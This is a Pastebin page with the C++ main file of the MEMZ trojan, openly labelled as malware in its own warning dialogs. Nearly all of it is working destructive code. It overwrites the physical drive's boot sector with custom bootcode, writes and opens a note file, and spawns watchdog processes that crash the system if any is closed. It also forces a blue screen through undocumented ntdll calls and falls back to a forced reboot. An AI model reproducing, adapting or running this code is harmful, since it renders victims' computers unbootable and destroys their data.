API tools faq
paste
Advertisement
FlyFar

main.cpp

FlyFar
Mar 21st, 2023
587
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 11.52 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include "memz.h"
  2.  
  3. int scrw, scrh;
  4.  
  5. #ifdef CLEAN
  6. HWND mainWindow; // In the main window, in the main window, in the main window, ...
  7. HFONT font;
  8. HWND dialog;
  9. #endif
  10.  
  11. void main() {
  12.     scrw = GetSystemMetrics(SM_CXSCREEN);
  13.     scrh = GetSystemMetrics(SM_CYSCREEN);
  14.  
  15. #ifndef CLEAN
  16.     int argc;
  17.     LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
  18.  
  19.     if (argc > 1) {
  20.         if (!lstrcmpW(argv[1], L"/watchdog")) {
  21.             CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);
  22.  
  23.             WNDCLASSEXA c;
  24.             c.cbSize = sizeof(WNDCLASSEXA);
  25.             c.lpfnWndProc = WindowProc;
  26.             c.lpszClassName = "hax";
  27.             c.style = 0;
  28.             c.cbClsExtra = 0;
  29.             c.cbWndExtra = 0;
  30.             c.hInstance = NULL;
  31.             c.hIcon = 0;
  32.             c.hCursor = 0;
  33.             c.hbrBackground = 0;
  34.             c.lpszMenuName = NULL;
  35.             c.hIconSm = 0;
  36.  
  37.             RegisterClassExA(&c);
  38.  
  39.             HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);
  40.  
  41.             MSG msg;
  42.             while (GetMessage(&msg, NULL, 0, 0) > 0) {
  43.                 TranslateMessage(&msg);
  44.                 DispatchMessage(&msg);
  45.             }
  46.         }
  47.     } else {
  48.         // Another very ugly formatting
  49.         if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
  50. This malware will harm your computer and makes it unusable.\r\n\
  51. If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
  52. If you know what this malware does and are using a safe environment to test, \
  53. press Yes to start it.\r\n\r\n\
  54. DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
  55. MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
  56. THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
  57. STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {
  58.             ExitProcess(0);
  59.         }
  60.  
  61.         wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);
  62.         GetModuleFileName(NULL, fn, 8192);
  63.  
  64.         for (int i = 0; i < 5; i++)
  65.             ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);
  66.  
  67.         SHELLEXECUTEINFO info;
  68.         info.cbSize = sizeof(SHELLEXECUTEINFO);
  69.         info.lpFile = fn;
  70.         info.lpParameters = L"/main";
  71.         info.fMask = SEE_MASK_NOCLOSEPROCESS;
  72.         info.hwnd = NULL;
  73.         info.lpVerb = NULL;
  74.         info.lpDirectory = NULL;
  75.         info.hInstApp = NULL;
  76.         info.nShow = SW_SHOWDEFAULT;
  77.  
  78.         ShellExecuteEx(&info);
  79.  
  80.         SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);
  81.  
  82.         ExitProcess(0);
  83.     }
  84.  
  85.     HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
  86.  
  87.     if (drive == INVALID_HANDLE_VALUE)
  88.         ExitProcess(2);
  89.  
  90.     unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
  91.  
  92.     // Join the two code parts together
  93.     int i = 0;
  94.     for (; i < code1_len; i++)
  95.         *(bootcode + i) = *(code1 + i);
  96.     for (i = 0; i < code2_len; i++)
  97.         *(bootcode + i + 0x1fe) = *(code2 + i);
  98.  
  99.     DWORD wb;
  100.     if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
  101.         ExitProcess(3);
  102.  
  103.     CloseHandle(drive);
  104.  
  105.     HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
  106.  
  107.     if (note == INVALID_HANDLE_VALUE)
  108.         ExitProcess(4);
  109.  
  110.     if (!WriteFile(note, msg, msg_len, &wb, NULL))
  111.         ExitProcess(5);
  112.  
  113.     CloseHandle(note);
  114.     ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);
  115.  
  116.     for (int p = 0; p < nPayloads; p++) {
  117.         Sleep(payloads[p].delay);
  118.         CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
  119.     }
  120.  
  121.     for (;;) {
  122.         Sleep(10000);
  123.     }
  124.  
  125. #else // CLEAN
  126.     InitCommonControls();
  127.  
  128.     dialog = NULL;
  129.  
  130.     LOGFONT lf;
  131.     GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);
  132.     font = CreateFont(lf.lfHeight, lf.lfWidth,
  133.         lf.lfEscapement, lf.lfOrientation, lf.lfWeight,
  134.         lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,
  135.         lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,
  136.         lf.lfPitchAndFamily, lf.lfFaceName);
  137.  
  138.     WNDCLASSEX c;
  139.     c.cbSize = sizeof(WNDCLASSEX);
  140.     c.lpfnWndProc = WindowProc;
  141.     c.lpszClassName = L"MEMZPanel";
  142.     c.style = CS_HREDRAW | CS_VREDRAW;
  143.     c.cbClsExtra = 0;
  144.     c.cbWndExtra = 0;
  145.     c.hInstance = NULL;
  146.     c.hIcon = 0;
  147.     c.hCursor = 0;
  148.     c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);
  149.     c.lpszMenuName = NULL;
  150.     c.hIconSm = 0;
  151.  
  152.     RegisterClassEx(&c);
  153.  
  154.     RECT rect;
  155.     rect.left = 0;
  156.     rect.right = WINDOWWIDTH;
  157.     rect.top = 0;
  158.     rect.bottom = WINDOWHEIGHT;
  159.  
  160.     AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);
  161.  
  162.     mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,
  163.         50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);
  164.  
  165.     for (int p = 0; p < nPayloads; p++) {
  166.         payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,
  167.             (p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT,
  168.             mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);
  169.         SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);
  170.  
  171.         CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
  172.     }
  173.  
  174.     SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);
  175.  
  176.     ShowWindow(mainWindow, SW_SHOW);
  177.     UpdateWindow(mainWindow);
  178.    
  179.     CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);
  180.  
  181.     MSG msg;
  182.     while (GetMessage(&msg, NULL, 0, 0) > 0) {
  183.         if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {
  184.             TranslateMessage(&msg);
  185.             DispatchMessage(&msg);
  186.         }
  187.     }
  188. #endif
  189. }
  190.  
  191. #ifndef CLEAN
  192. LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
  193.     if (msg == WM_CLOSE || msg == WM_ENDSESSION) {
  194.         killWindows();
  195.         return 0;
  196.     }
  197.  
  198.     return DefWindowProc(hwnd, msg, wParam, lParam);
  199. }
  200.  
  201. DWORD WINAPI watchdogThread(LPVOID parameter) {
  202.     int oproc = 0;
  203.  
  204.     char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
  205.     GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);
  206.  
  207.     Sleep(1000);
  208.  
  209.     for (;;) {
  210.         HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  211.         PROCESSENTRY32 proc;
  212.         proc.dwSize = sizeof(proc);
  213.  
  214.         Process32First(snapshot, &proc);
  215.  
  216.         int nproc = 0;
  217.         do {
  218.             HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);
  219.             char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
  220.             GetProcessImageFileNameA(hProc, fn2, 512);
  221.  
  222.             if (!lstrcmpA(fn, fn2)) {
  223.                 nproc++;
  224.             }
  225.  
  226.             CloseHandle(hProc);
  227.             LocalFree(fn2);
  228.         } while (Process32Next(snapshot, &proc));
  229.  
  230.         CloseHandle(snapshot);
  231.  
  232.         if (nproc < oproc) {
  233.             killWindows();
  234.         }
  235.  
  236.         oproc = nproc;
  237.  
  238.         Sleep(10);
  239.     }
  240. }
  241.  
  242. void killWindows() {
  243.     // Show cool MessageBoxes
  244.     for (int i = 0; i < 20; i++) {
  245.         CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);
  246.         Sleep(100);
  247.     }
  248.  
  249.     killWindowsInstant();
  250. }
  251.  
  252. void killWindowsInstant() {
  253.     // Try to force BSOD first
  254.     // I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...
  255.     // This isn't even an exploit, it's just an undocumented feature.
  256.     HMODULE ntdll = LoadLibraryA("ntdll");
  257.     FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");
  258.     FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
  259.  
  260.     if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {
  261.         BOOLEAN tmp1; DWORD tmp2;
  262.         ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);
  263.         ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);
  264.     }
  265.  
  266.     // If the computer is still running, do it the normal way
  267.     HANDLE token;
  268.     TOKEN_PRIVILEGES privileges;
  269.  
  270.     OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);
  271.  
  272.     LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);
  273.     privileges.PrivilegeCount = 1;
  274.     privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  275.  
  276.     AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);
  277.  
  278.     // The actual restart
  279.     ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
  280. }
  281.  
  282. DWORD WINAPI ripMessageThread(LPVOID parameter) {
  283.     HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
  284.     MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
  285.     UnhookWindowsHookEx(hook);
  286.  
  287.     return 0;
  288. }
  289. #else // CLEAN
  290. LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
  291.     PAINTSTRUCT ps;
  292.     HDC hdc;
  293.    
  294.     if (msg == WM_ACTIVATE) {
  295.         if (wParam == NULL)
  296.             dialog = NULL;
  297.         else
  298.             dialog = hwnd;
  299.     } else if (msg == WM_DESTROY) {
  300.         ExitProcess(0);
  301.     } else if (msg == WM_COMMAND) {
  302.         if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
  303.             for (int p = 0; p < nPayloads; p++) {
  304.                 if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {
  305.                     SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);
  306.                     // Most ugly formatting EVER
  307.                     if (MessageBoxA(hwnd,
  308.                         "This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
  309. If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
  310. virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
  311. Do you still want to enable it?",
  312. "MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {
  313.                         SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);
  314.                     }
  315.                 }
  316.             }
  317.         }
  318.     } else if (msg == WM_PAINT) {
  319.         hdc = BeginPaint(hwnd, &ps);
  320.         SelectObject(hdc, font);
  321.         LPWSTR str;
  322.         LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";
  323.         FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,
  324.             L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);
  325.  
  326.         TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));
  327.         TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);
  328.  
  329.         EndPaint(hwnd, &ps);
  330.     } else {
  331.         return DefWindowProc(hwnd, msg, wParam, lParam);
  332.     }
  333.  
  334.     return 0;
  335. }
  336.  
  337. DWORD WINAPI keyboardThread(LPVOID lParam) {
  338.     for (;;) {
  339.         if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
  340.             enablePayloads = !enablePayloads;
  341.  
  342.             if (!enablePayloads) {
  343.                 RECT rect;
  344.                 HWND desktop = GetDesktopWindow();
  345.                 GetWindowRect(desktop, &rect);
  346.  
  347.                 RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);
  348.  
  349.                 EnumWindows(&CleanWindowsProc, NULL);
  350.             } else {
  351.                 RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);
  352.             }
  353.  
  354.             while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
  355.                 Sleep(100);
  356.             }
  357.         } else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {
  358.             if (enablePayloads) {
  359.                 for (int p = 0; p < nPayloads; p++) {
  360.                     if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
  361.                         payloads[p].delay = payloads[p].payloadFunction(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);
  362.                     }
  363.                 }
  364.             }
  365.         }
  366.  
  367.         Sleep(10);
  368.     }
  369.  
  370.     return 0;
  371. }
  372.  
  373. BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {
  374.     DWORD pid;
  375.     if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {
  376.         SendMessage(hwnd, WM_CLOSE, 0, 0);
  377.     }
  378.     return TRUE;
  379. }
  380. #endif
  381.  
  382.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!